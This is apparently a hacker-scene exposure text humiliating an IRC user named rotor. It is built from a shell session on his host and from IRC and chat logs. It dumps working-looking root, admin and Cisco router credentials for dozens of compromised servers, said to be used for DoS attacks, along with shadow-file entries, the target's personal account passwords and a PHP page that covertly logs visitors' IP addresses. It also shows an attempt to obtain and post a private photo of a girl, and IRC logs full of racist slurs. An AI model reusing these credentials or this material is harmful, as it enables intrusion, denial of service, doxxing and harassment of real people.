AAAAB3NzaC1kc3MAAACBAOtzWiwjm6Igblec4brkI/7/71jC6WFyKmQXs8hV3XWuFhBXsMEGyibVKGMtCi7A4tkpu4MywK46NY/z5qehLuWTpcB7+u0TVahzUUsSgEwJte0QiyVdERRfq4b/vEeOMzPcHXLoqE14trBpINaT0MgPHicxeYOoFJECGprQ9d0bAAAAFQDOv6FuT2InFrcf1VAtbmdk3NzQgQAAAIEA5OJd123ZHu9YoWqRHZH7sbvjwZ/wSo1nw6LK44HD2fgY3GwVbN4gLxv4iLbmTQjOdM39B8fdUG2BHXvo2ObZZJELggd6lK/l9rUDmbwLIz6Eu09oHMKWEn8wuLMECVb6LLz76yI7s8eUFFSAQYhqZODsLlLmAazHaud2eMFpbq0AAACBAOWe3dieZLlcZrTfzLnTyYq8ZvypZIBKmM0jqMJzI2eHSMtN9DsvB0WU6TloGq+7twlN1FQRqBb8aj0gAahrn6kFhihsrk9OU1zhH7QACF/oPDSOOIDXdJ0snEQdZsdsIJkC8S+vio9/9g4dzdHpjCc5EwJtKQ6jSbK3qhUDL55Y
lq(rotor@Sentinel.homeunix.net)
mq(~)-> cd own/
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> ls
./ arren.php djwink.php e.php hostile.php kels.php
lamerDJWINK lamerE lamerHOSTILE lamerLOCUSTZ lamerREVIX
lamerSILKK lamerWARCHILD nesa.php seattle.php spectre.php
../ badonkadonk.png dog.php escape.php index.html lamerARREN
lamerDOG lamerESCAPE lamerKELS lamerNESA lamerSEATTLE
lamerSPECTRE locustz.php revix.php silkk.php warchild.php
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat lamer*
82.96.75.4
69.175.61.131
64.231.24.208
69.30.127.50
64.171.15.120
24.10.182.92
82.40.95.54
69.30.127.50
64.231.24.208
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat arren.php
<?php
$hostname = $_SERVER['REMOTE_ADDR'];
$file = fopen("lamerARREN", a);
fwrite($file, $hostname . "\r\n");
fclose($file);
//print $hostname;
?>
<html>
<head>
<title>Ass for Days!</title>
</head>
<body>
<img src="badonkadonk.png">
</body>
</html>
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cd ..
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> ls
./ .cshrc .mail_aliases .rhosts aolup.bx cyp/
dog.php escape.php kels.php lamerDOG lamerHOSTILE lamerNESA
lamerSILKK locustz.php revix.php spectre.php
../ .login .mailrc .shrc arren.php
cyp1.0k.tar.gz dyndns hostile.php lamerARREN lamerE lamerKELS
lamerREVIX lamerSPECTRE nesa.php seattle.php warchild.php
.BitchX/ .login_conf .profile .ssh/ badonkadonk.png djwink.php
e.php index.html lamerDJWINK lamerESCAPE lamerLOCUSTZ
lamerSEATTLE lamerWARCHILD own/ silkk.php
## hmm.. Im disapointed.. but wait
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cd " " ## Wow thats skills...
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> ls
cisco cisco2 ddoslog legit list more-cisco owned usable
## ok this just got interesting.
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat cisco*
200.68.58.33
66.38.132.185
200.78.145.114
200.78.154.34
200.78.162.1
200.78.242.185
200.45.170.81
200.45.173.33
200.101.84.198 login 4490@brt enable: rotor
200.78.5.16
200.45.67.209 login cisco enable: cisco
200.32.71.114
200.32.71.174
200.32.91.198
200.32.102.66
200.32.125.4
200.32.126.34
200.20.0.227
200.20.92.82
200.41.0.138
200.41.3.17
200.41.6.49
200.41.7.17
200.41.10.177
200.41.10.209
200.41.24.9
200.41.25.122
200.41.25.190
200.41.25.186
200.41.25.198
200.41.25.234
200.41.25.246
200.41.25.54
200.41.38.66
200.41.38.78
200.41.38.122
200.41.38.170
200.41.38.150
200.41.38.206
200.41.38.246
200.41.38.254
200.41.39.113
200.41.39.169
200.41.40.22
200.41.40.50
200.41.40.82
200.41.40.102
200.41.40.130
200.41.40.154
200.41.40.182
200.41.40.189
200.41.40.206
200.41.40.254
200.41.42.225
200.41.44.193
200.41.47.79
200.41.47.81
200.41.47.209
200.41.60.193
200.41.61.145
200.41.61.225
200.41.61.241
200.41.62.137
200.41.62.161
200.41.62.207
200.41.62.217
200.41.63.97
200.41.63.114
200.41.63.141
200.41.63.170
200.41.63.214
200.41.63.250
200.41.66.129
200.41.67.41
200.41.67.57
200.41.68.14
200.41.68.50
200.41.68.102
200.41.68.142
200.41.68.34
200.41.68.174
200.41.68.182
200.41.68.242
200.41.68.234
200.41.68.246
200.41.68.222
200.41.79.134
200.41.79.133
200.41.85.1
200.41.85.161
200.41.91.85
200.41.91.83
200.41.127.65
200.41.226.129
200.41.226.145
200.41.226.161
200.41.226.225
200.41.228.18
200.41.229.217
200.41.230.17
200.41.229.242
200.41.231.49
200.41.233.39
200.41.234.66
200.41.234.246
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> ls
cisco cisco2 ddoslog legit list more-cisco owned usable
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat ddoslog
04:40 <@Kelly> [02:40] -> *rotor`* its comments and threats like that that
define you as a
fucking pup
04:40 <@Kelly> -
04:41 <@aid> haha
04:41 <@aid> yok
04:41 <@aid> a
04:41 <@aid> kelly
04:41 <@aid> omg
04:41 <@aid> ./wi torn
04:41 <@aid> and go to the url
04:41 <@aid> haha
04:41 <@aid> you're gonna piss yourself
04:41 <@aid> i chose the perf box to jupe him with
04:41 <@aid> haha
04:44 <@Kelly> hahahhaha
04:44 <@aid> now
04:44 <@aid> that
04:44 <@aid> is
04:44 <@aid> hilarious
04:44 <@aid> haha
04:44 <@aid> i just hit rotor`
04:44 <@aid> his new bnc
04:44 <@aid> lol
04:44 <@aid> toast
04:44 <@aid> --- 209.133.9.34 ping statistics ---
04:44 <@aid> 8 packets transmitted, 0 received, 100% packet loss, time
7013ms
04:45 <@Kelly> [02:40] <rotor`> well, you suck cock for cancelled shells...
heh
04:45 <@Kelly> [02:41] <rotor`> and tehy are hitting lomag again, only this
time i have logs
of aid saying he was going to it from #obs, obs has
snitches u know
04:45 <@Kelly> [02:42] <rotor`> get over youself
04:45 <@Kelly> [02:44] <Kelly> Yannow
04:45 <@Kelly> [02:44] <Kelly> you obviously have never whoised me dumbass
04:45 <@Kelly> [02:44] <Kelly> I work for most of the same providers
04:45 <@Kelly> [02:44] <Kelly> you have shells with
04:45 <@Kelly> [02:45] <Kelly> you fucked up when you had one hit that i
work for
04:45 <@Kelly> [02:45] No such nick/channel
04:45 <@aid> lol
04:46 <@aid> haha
04:46 <@aid> rotor` is ~nicuxoji@69.22.129.220 * qeje
04:46 <@aid> rotor` on #syshackers
04:46 <@aid> he'[s
04:46 <@aid> in
04:46 <@aid> my bot is still in
04:46 <@aid> syshackers
04:46 <@aid> haha
04:46 <@Kelly> lol
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat legit
Tony Montana - Vote for Pedro says:
69.17.188.187
adduser: INFO: Password for (h0rs3) is: QiivMOtLoiFZJC7
[jsz(jsz@pheer.my.0c192.com)] k
[jsz(jsz@pheer.my.0c192.com)] www.cserverz.com/r0t0r
<Torn> god
[jsz(jsz@pheer.my.0c192.com)] user: rotor
[jsz(jsz@pheer.my.0c192.com)] pass: fuckf3ds
[jsz(jsz@pheer.my.0c192.com)] ftp details: u: r0t0r p: fuck3dup
[jsz(jsz@pheer.my.0c192.com)] username for ftp is r0t0r@cserverz.com
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat list
216.127.76.25 admin:1407791
67.15.70.17 admin:jeBam03
66.134.206.227 backup:oldrh lasick:lachuv
211.21.136.163 pgsql:pgsql toor:snortwest
| rmd
64.246.0.35 admin::55ttiot_mily root:55ttiot_mily/tbm
| root
216.127.92.54 admin:ferinolR
| root
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> ls
cisco cisco2 ddoslog legit list more-cisco owned usable
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat more-cisco
200.67.149.163
200.67.153.210
200.67.224.250
200.67.244.245
200.66.84.69
200.66.100.23
200.168.219.217
200.53.106.34
200.76.2.42
200.76.2.54
200.76.2.66
200.76.2.30
200.76.2.118
200.76.2.126
200.76.149.158
200.76.149.166
200.76.149.186
200.76.149.198
200.76.174.30
200.76.178.81
200.76.174.97
200.62.137.17
200.62.154.218
200.56.68.105
200.56.71.66
200.56.124.154
200.67.97.247
200.56.126.250
200.62.137.17
200.62.185.234
200.62.187.198
200.56.99.2
200.56.123.54
200.62.136.161
200.76.29.130
200.62.134.72
200.76.4.78
200.76.12.30
200.28.45.193
200.62.2.199
200.76.3.26
200.76.3.190
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat owned
66.139.78.11
jimmy:bandb:12493:0:99999:7:::
sandj:pinetree:12693:0:99999:7:::
cochran:rickey:12690:0:99999:7:::
mary:coomer:12718:0:99999:7:::
grandjeep:truck:12818:0:99999:7:::
[66.134.112.117]
L:monitor PW: monitor
67.15.58.14 big0tree
67.15.104.18I8mB2ad
67.15.18.8 z01202882481
67.15.20.23 1shoot
67.15.2.40 Q"4zR^sP
67.15.80.98 Gk59R23c
67.15.20.23 1shoot
67.15.96.67 t3mp
67.15.64.21 v0daf0ne
67.15.56.7 THISRULES2
66.98.252.61 RlUdR6eJ5esp
67.15.74.25 d4rBo96mn
67.15.38.59 1heavan
67.15.68.91 a3317bfswdjf
67.15.68.92 hot14554
67.15.94.9 fodase
67.15.58.5 fr3nchd00r
204.44.192.18 HqDo14761181c22
67.15.62.49 bond007
64.246.42.13 benzg500
67.15.86.30 majid999
66.98.252.49 Jba0320Fl
66.98.252.24 1QmORdA5
67.15.12.90 kalimantan1
66.98.252.49 Jba0320Fl
67.15.80.16 jft690ie
66.98.164.92 mizpa77
66.98.150.75 10OcT03
66.98.166.87 1odjnmrt01
216.127.90.9 jengcoil BSD
64.246.28.61 crayonblackdown
64.246.58.97 mc10cc19mb68
66.98.254.23 hell001lleh
69.57.130.33 bbb456
216.127.92.22 login=rspoel xl$7Wh%Zev#T85.2
67.15.84.44 o35j38h2
67.15.2.12 7377boolala
67.15.82.32 gz957435
66.98.150.75 10OcT03
216.127.84.58 1drester23
207.44.226.26 Admin Password: daAt3am1985x Root Password: m0uldy!SPUDx
67.15.22.24 gek5150
66.98.250.25 12suma266
67.15.48.36 Kp7GR29vs1q
207.44.168.60 web2deb
67.15.86.2 Dd37B8vH84V6
207.44.168.60 web2deb
67.15.86.2 Dd37B8vH84V6
67.15.4.96 perk5085
67.15.66.40 askf445s
67.15.2.2 0r9ng#3 port 7005 ssh
67.15.2.45 login mol pass 6646645qzxpmn7193 su pass 33626066minasgyb4952
207.44.130.55 rEmit+75
67.15.2.17 man4man
66.98.202.6 conan55
67.15.94.21 types5goody
66.98.250.79 6swo040501
66.98.244.16 daped315
67.15.80.16 jft690ie
67.15.22.24 saucy1
67.15.22.24 saucy1
64.246.24.116 1990Richard
216.12.213.203 yourmomma
207.44.226.18 998shoupave
216.127.72.121 px88es7
207.44.168.60 web2red
216.40.243.24 galaxy21CO
64.246.52.8 Chela2003
66.98.190.91 bme3495
216.127.72.121 px88es7
66.98.246.59 barok92229
67.15.38.100 jb90jb2000
67.15.58.28 CMN07doctor
67.15.60.53 a3939889
67.15.86.30 majid999
67.15.34.3 swadminsw
67.15.12.43 fl4m3r d0theck!
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat usable
200.68.58.33
66.38.132.185
200.78.145.114
200.78.154.34
200.78.162.1
200.78.242.185
200.45.170.81
200.45.173.33
200.45.252.1
200.45.252.17
200.45.255.145
200.32.71.174
200.44.42.222
200.44.42.242
200.44.120.145
200.44.124.110
200.44.144.138
200.44.153.30
200.44.157.57
200.44.159.102
200.44.168.137
200.44.169.26
200.44.178.65
200.44.181.209
200.28.45.193
200.62.2.199
priv mode below
200.32.71.114
200.41.232.17
200.41.232.65
200.41.80.185
200.46.53.114
200.46.193.65
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> exit
## Well that takes care of that shell....
## Until next time
[5] logs to show how leet r0t0r really is.
13:06 <@devii> You're not an abo, rotor.
13:06 <@rotor`> illusion said u said that
13:06 <@rotor`> Uh,
13:06 <@devii> You cant be.
13:06 <@rotor`> yes i am devii
13:06 <@devii> If ur dad is black
13:06 <@rotor`> 50 / 50
13:06 <@devii> and ur mum is white
13:06 <@rotor`> Yes i can be
13:06 <@devii> black ALWAYS dominates.
13:07 <@devii> its a proven fact
13:07 <@rotor`> devii : no it dosnt
13:07 <@devii> it does.
13:07 <@devii> there are rare exceptions.
13:07 <@rotor`> devii: your saying you have never seen a white aboriginal ?
13:07 <@rotor`> I SWEAR TO FUCKING GOD I AM
13:07 <@devii> Ahahaahahaah.
13:07 <@rotor`> HOW ELSE COULD I LIVE IN ABORIGINAL HOUSING
13:07 <@rotor`> IN A MISSION # How sad..
13:07 <@devii> YAH FUCKEN WABO.
13:07 <@rotor`> U FUCK TARD
13:07 <@devii> rofl.
13:07 <@devii> Ohmy.
13:07 <@Torhne> lol
13:07 <@devii> see wigger, nigger
13:07 <@rotor`> dont tell me im not what i am
13:08 <@rotor`> i love my culture / family
13:08 <@devii> WELL THATS NICE ISNT IT.
13:08 <@rotor`> and am protective about it
13:08 <@devii> But you're not abo.
13:08 <@rotor`> w/e you reackon
13:08 <@devii> =P
13:08 <@rotor`> that pisses me off
13:08 <@rotor`> U JUST PISSED ME OFF
13:09 <@Torhne> lol
13:09 <@rotor`> trying to tell me im not what i am
13:09 <@rotor`> if u dont beleive me devii come down here
13:09 <@rotor`> to my home
13:09 <@rotor`> and aboriginals will answer the door
13:09 <@rotor`> and will live all around me
13:09 <@rotor`> U DONT KNOW JACK SHIT
13:09 <@rotor`> U LIVE IN A RICH TOWN
13:10 <@rotor`> WITH NO ABORIGINALS
13:10 <@rotor`> U ONLY KNOW WHAT U SEE ON FUCKING TV
13:10 <@rotor`> AFK # I bet
he was crying here...
13:10 <@Torhne> HAS A DINGO EVER ATE YOUR BABY???
13:10 <@Torhne> HA BITCH?
13:10 <@Torhne> WHAT NOW?
13:10 <@Torhne> ROTOR IS STrAIGHT OUT OF THE MUTHA FUCKIN HOOD OF AUSSIE
LAND # Who is this kid?
13:11 <@Torhne> HE HAS GOT THAT SHIT ON LOCKDOWN
13:11 <@Torhne> SO TIGHT
13:11 <@Torhne> FUCKIN WITH THE BOOMERANG HANGIN OUT THE BACKSIDE OF HIS
LOIN CLOTH
13:11 <@Torhne> whrew
13:11 <@rotor`> devii : im serious u dont beleive me #
He is done crying and goes back to bitching at girls.
13:11 <@Torhne> ok
13:11 <@rotor`> come and find out
13:11 <@Torhne> im done
13:11 <@devii> rofl
13:11 <@devii> cut siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiick
13:11 <@devii> cut siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiick
13:11 <@devii> cut siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiick
13:11 <@devii> cut siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiick
13:12 <@rotor`> you cannot comment on what you dont know
13:12 <@devii> Oh but i know ;/
13:12 <@rotor`> HTF would you know how my parents genes worked
13:12 <@rotor`> HTF would you know how my parents genes worked
13:12 <@rotor`> HTF would you know how my parents genes worked
13:12 <@devii> That abo's cant afford computers.
13:12 <@devii> lol
13:12 <@rotor`> U WOULDNT
13:12 <@rotor`> devii : now your just being racist
13:12 <@devii> lol no im not
13:12 <@rotor`> idk how you rich fucks thinks
13:12 <@rotor`> But why am i on here
13:12 <@devii> AHAHAH
13:12 <@rotor`> on a 56k # Get a job
then.
13:13 <@rotor`> and a pentium 1
13:13 <@rotor`> ?
13:13 <@devii> I WAS ON 56K FOR YEARS.
13:13 <@rotor`> DID U FUCKING THINK OF THAT
13:13 <@devii> Hahahahaaha
13:13 <@devii> aof'hsoidgfisdfg
13:13 <@devii> go drink some more goon then.
13:13 <@rotor`> shut ur rich racist fucking mouth up
13:13 <@devii> petrol sniffuh.
13:13 <@rotor`> So
13:13 <@devii> LOL
13:13 <@rotor`> who cares
13:13 <@devii> Haha
13:13 <@devii> Or steel another one of my thongs.
13:13 <@devii> GO ON DO IT.
13:13 <@rotor`> wow im not a rich stuck up daddys girl
13:13 <@devii> JUST ONE THOUGH.
13:14 <@rotor`> WOWO
13:14 <@devii> Aawh ;p
13:14 <@Torhne> HE WILL STEAL THAT SHIT WHEN YIOU ARE WEARING IT #
Can this kid just shut the fuck up..
13:14 <@devii> ROFL.
13:14 <@rotor`> MY DADDY DOSNT SUPPLY ME EVERYTHING #
Probably because he is a drunk.
13:14 -!- mode/#Killerz [+b *!*@203.51.179.47] by rotor`
13:14 <@devii> COS THATS WHAT ABBO'S DO.
13:14 -!- devii was kicked from #killerz by ping [Banned]
13:14 <@rotor`> no one bags on my heritage
13:35 <@rotor`> blizzy she isnt online anymore
13:36 < blizzy> why?
13:36 <@rotor`> i ddos'd her off
13:36 < blizzy> ok..
# From DDoS attacking NSA to DDoS attacking girls on IRC.... He is truly a
great hacker.
---------------------------------------------------------------------------------------------------------
Unfourtanetly I didnt manage to get the logs of when rotor joined #b4b0 and
threatend to "own us all" :/
---------------------------------------------------------------------------------------------------------
[6] r0t0rs roots (that still works), ciscos (that still works) and
passwords.
roots that still works:
216.127.76.25 admin:1407791
67.15.70.17 admin:jeBam03
66.134.206.227 backup:oldrh lasick:lachuv
211.21.136.163 pgsql:pgsql toor:snortwest
64.246.0.35 admin::55ttiot_mily root:55ttiot_mily/tbm
216.127.92.54 admin:ferinolR
66.139.78.11
jimmy:bandb:12493:0:99999:7:::
sandj:pinetree:12693:0:99999:7:::
cochran:rickey:12690:0:99999:7:::
mary:coomer:12718:0:99999:7:::
grandjeep:truck:12818:0:99999:7:::
207.44.226.18 998shoupave
# For a complete list just scroll up =)
These are the cisco boxes he uses to DoS people with:
Password: cisco
200.68.58.33
66.38.132.185
200.78.145.114
200.78.154.34
200.78.162.1
200.78.242.185
200.45.170.81
200.45.173.33
200.45.252.1
200.45.252.17
200.45.255.145
200.32.71.174
200.44.42.222
200.44.42.242
200.44.120.145
200.44.124.110
200.44.144.138
200.44.153.30
200.44.157.57
200.44.159.102
200.44.168.137
200.44.169.26
200.44.178.65
200.44.181.209
200.28.45.193
200.62.2.199
priv mode below:
200.32.71.114
200.41.232.17
200.41.232.65
200.41.80.185
200.46.53.114
200.46.193.65
200.68.58.33
66.38.132.185
200.78.145.114
200.78.154.34
200.78.162.1
200.78.242.185
200.45.170.81
200.45.173.33
200.101.84.198 login 4490@brt enable: rotor
200.78.5.16
200.45.67.209 login cisco enable: cisco
200.67.149.163
200.67.153.210
200.67.224.250
200.67.244.245
200.66.84.69
200.66.100.23
200.168.219.217
200.53.106.34
200.76.2.42
200.76.2.54
200.76.2.66
200.76.2.30
200.76.2.118
200.76.2.126
200.76.149.158
200.76.149.166
200.76.149.186
200.76.149.198
200.76.174.30
200.76.178.81
200.76.174.97
200.62.137.17
200.62.154.218
200.56.68.105
200.56.71.66
200.56.124.154
200.67.97.247
200.56.126.250
200.62.137.17
200.62.185.234
200.62.187.198
200.56.99.2
200.56.123.54
200.62.136.161
200.76.29.130
200.62.134.72
200.76.4.78
200.76.12.30
200.28.45.193
200.62.2.199
200.76.3.26
200.76.3.190
He really does have a great selection of passwords:
ssh -l rotor matts.homeunix.net
password: fuck3dup
ssh -l h0rs3 69.17.188.187 # Dynamic IP
password: QiivMOtLoiFZJC7
ssh -l hts ircd2.lomag.net
password: 0mgbatm0n
ftp panther.unixbsd.info (killerz.org)
user: killerz
password: fuck3dupsh1t
ftp cserverz.com
user: r0t0r
password: fuck3dup
www.cserverz.com/r0t0r/ # The stuff he has here is really funny..
user: rotor
password: fuckf3ds
rotorized9@hotmail.com # Also his MSN
password: fuckfeds
He also uses:
fedsown
Rotor has finally figured out he was owned and he has changed passwords
on
matts.homeunix.net and cserverz.com. Rest are the same I guess.
I dont have the new IP to "69.17.188.187", but there wasnt anything
interesting on it anyways.
You can find the unreal.conf to his IRC server on his email.
[7] Ok after getting all of his passwords, shells, email and all I think its
time to find that god damn picture!
(20:38:06) r0t0r: for some reason
(20:38:10) r0t0r: i like a pakistani girl
(20:38:48) Blizzy: heheh
(20:38:49) Blizzy: cool
(20:38:57) r0t0r: want a pic!?
(20:39:05) Blizzy: yeah sure
(20:39:14) r0t0r: http://kold.multiply.com/photos/album/1
(20:39:38) Blizzy: she is pretty
(20:40:16) r0t0r: damn right
(20:40:29) r0t0r: she sent me pics of her top half Up
(20:40:33) r0t0r: I tihnk she likez me
# Did she... hmm.. I wanna get my hands on that pic!
(20:45:39) r0t0r: Who's pic did u find!?
(20:45:42) Blizzy: kc
(20:45:43) Blizzy: fuck dude
(20:45:45) Blizzy: she is HOT
(20:45:50) r0t0r: erg
(20:46:01) Blizzy: I want her to have my children
(20:46:03) r0t0r: were did you find it?
(20:46:11) Blizzy: your email.. I was hoping for a naked pic :(
(20:46:15) Blizzy: But dude.. SHE IS HOT
(20:46:16) Blizzy: SO HOT
(20:46:24) Blizzy: fuck...
(20:46:30) r0t0r: YOu didnt hand that pic out did you?>
(20:46:34) Blizzy: Nope
(20:46:43) Blizzy: I just drooled for.. 10 minutes then closed the
window
(20:48:33) r0t0r: Now she is pissed off i tihnk
(20:49:55) Blizzy: tell her I wanna marry her :P
(20:49:56) Blizzy: hehe
(20:50:06) Blizzy: the pic never got public
(21:05:49) r0t0r: LoL
(21:05:53) r0t0r: she hates me now
# Aint that sad...
Ehm.... www.someurl.com/kc.jpg # need to find someone to host the pic.
[8] Conclusion
r0t0r check list:
1. Own killerz [CHECK]
2. Own matts.homeunix.net [CHECK]
3. Find more shells and own them [CHECK]
4. Expose rotor as a fake and a drunk [CHECK]
5. Expose r0t0rs lame roots [CHECK]
6. Find his cisco's which he uses to DoS people [CHECK]
7. Get his passwords and see if I can find a naked
pic of that girl he is messing around with. [She wasnt
naked, but it was still a nice pic]
Well I guess thats it.. rotor is owned...
Reference in a new issue View git blame Copy permalink